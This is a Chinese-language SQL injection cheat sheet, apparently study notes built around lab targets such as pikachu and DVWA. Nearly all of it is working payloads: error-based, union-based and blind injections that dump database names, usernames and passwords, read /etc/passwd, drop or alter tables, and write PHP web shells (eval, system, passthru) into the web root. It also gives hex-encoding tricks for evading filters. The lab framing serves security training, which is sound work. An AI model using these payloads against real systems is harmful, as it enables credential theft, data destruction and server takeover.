标签:利用 服务器 后台 通过 HERE 两种 过滤 ref user
and 1=1 --
和 and 1=2 --
输入‘ " % ( ) 查看是否出错
‘ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘pikachu‘ limit 0,1)),0) #
其中0x7e是防止错误信息被过滤。insert into member(username, pw, sex, phonenum, email, address) values(‘1‘ or updatexml(1,concat(‘0x7e‘database()),0) or ‘‘, 11111, 1, 2, 3, 4);
报错显示数据库名‘ and extractvalue(0, concat(0x7e, version())) #
data‘ and (select 2 from (select count(*), concat(version(), floor(rand(0)*2))x from information_schema.tables group by x)a) #
kobe‘ and (select 2 from (select count(*), concat((select password from users where username=‘admin‘ limit 0,1), floor(rand(0)*2))x from information_schema.tables group by x)a)#
假设后台语句 select * from users where id = ___
输入 | 拼接得到语句 | |
‘ and ‘1‘ = ‘1 或 1‘ and ‘1 | select * from users where id = ‘ ‘ and ‘1‘ = ‘1‘ | 不会影响结果 |
‘ and ‘1‘ = ‘2 或 1‘ and ‘0 | select * from users where id = ‘ ‘ and ‘1‘ = ‘2 ‘ | 报错 |
‘ or ‘1‘ = ‘1‘ 或 ‘ or ‘1 | select * from users where id = ‘ ‘ or ‘1‘ = ‘1‘ | 查询到所有数据 |
可利用 burp 的爆破功能爆破
‘ order by 2 --
// 判断是否大于等于两行,-- 后需要有一个空格
‘ and \(columnName\) is null -- | 猜列名,存在无反应,不存在报错 |
‘ and \(table\).column is null -- | 猜本表名,列名已知 |
‘ and \(db\).table.column is null -- | 猜本库名 |
‘ and (select cout(*) from \(table\))>0 -- | 猜本库其他表名,当table不存在报错 |
‘ and othertable.\(column\) is null -- | 猜其他表列名 |
‘ or user = ‘admin‘ -- ‘ or user like %a% -- |
猜字段 |
‘ or user=‘admin‘ and password ‘md5hashmd5hashmd5hashmd5hashmd5hash‘ -- | 猜账号对应密码 |
‘; update users set user=‘user‘ where user=‘admin‘ -- | 写当前表 |
‘; insert .........; -- | |
‘; delete ........; -- ‘; drop table users; -- |
‘ union select 1,2 -- | select * from users where id = ‘‘ union select 1,2 -- ‘ | 查询第一个第二个字段的名称。联合查询的数据列数要相同 |
‘ union select * from ___ | select * from users where id = ‘‘ union select * from ___ | |
‘ union all select database() | ||
‘ union select user(), 2 -- | select * from users where id=‘‘ union select user(), 2 |
char() 将ASCII转为字符,防止被服务器过滤
concat_ws(char(32,58,32), user(), database(), version()) 将查询函数结果连接并按第一个字符串分隔
information_schema 包含了数据库的元信息
data‘ and exists(select * from database.table) #
‘ union select table_name,table_schema from information_schema.tables-- | 查表名与库名 |
‘ union select table_schema,count(*) from information_schema.tables group by table_schema -- | 查库及其包含的表个数 |
‘ union select table_name,table_schema from information_schema.tables where table_schema=‘dvwa‘-- | dvwa库下的表 |
‘ union select table_name,column_name from information_schema.columns where table_schema=‘dvwa‘ and table_name=‘users’-- | 查询dvwa库中表名与列名 |
‘ union select user,password from dvwa.users-- | |
‘ union select null, concat(user,0x3a,password) from users-- |
load_file() 读文件 | ‘ union select null, load_file(‘/etc/passwd‘) -- | |
写文件 | ‘ union select null, "<?php passthru($_GET[‘cmd‘]) ?>" into dumpfile "cmd.php" -- | |
mysql账号权限不够大时无法访问information_schema | ‘ union select null, concat(user, 0x3a, password) from users into outfile ‘/tmp/db.txt‘ -- |
写入文件时mysql默认写入家目录下 /usr/lib/mysql/dvwa/cmd.php ;但执行php的apache用户无权限访问,且mysql也无法将木马写入/var/www目录下
上传webshell文件 /usr/share/webshells/php/php-reverse-shell.php
编码为16进制可防止字符过滤。mysql的 into dumpfile 会将其转换为字符。使用 xxd 工具,再使用 tr 去除\n cat webshell.php | xxd -ps | tr -d ‘\n‘。此webshell过大,无法用get方式上传
and 1=1 / and 1=2
发现可以判断data‘ and sleep(5)
如果延迟5秒后正确返回数据则存在盲注data‘ and if((substr(database(),1,1))=‘p‘, sleep(5), null) #
如果database()函数返回的数据第一个字符是p则延迟5秒,否则执行nullLength()函数 返回字符串的长度
sleep(n):将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
/* 整型注入 */
sql-bool.php?name=user1 and 1=1
sql-bool.php?name=user1 and 1=2
/* 字符型注入 */
sql-bool.php?name=user1‘ and ‘1‘=‘1
sql-bool.php?name=user1‘ and ‘1‘=‘2
/* 字符型注入 */
sql-bool.php?name=user1" and "1"="1
sql-bool.php?name=user1" and "1"="2
/* 判断库名长度 */
sql-bool.php?name=user1‘ and (select length(database())) = 1 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select length(database())) = 2 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select length(database())) = 3 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select length(database())) = 4 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ascii(substring(database(),1,1))) = 97 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ascii(substring(database(),1,1))) = 98 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 99 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 100 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 101 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 102 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 103 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 104 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 105 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 106 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 107 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 108 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 109 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 110 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 111 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 112 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 113 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 114 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 115 and ‘1‘=‘1
sql-bool.php?name=user1‘ and (select ord(substring(database(),1,1))) = 116 and ‘1‘=‘1
select 1,2 into outfile "/var/www/html/1.txt"
payload:data‘ union select "<?php @eval($_GET[‘test‘])?>",2 into outfile "/var/www.html/1.php" #
payload:data‘ union select "<?php system($_GET[‘test‘])?>",2 into outfile "/var/www.html/1.php" #
标签:利用 服务器 后台 通过 HERE 两种 过滤 ref user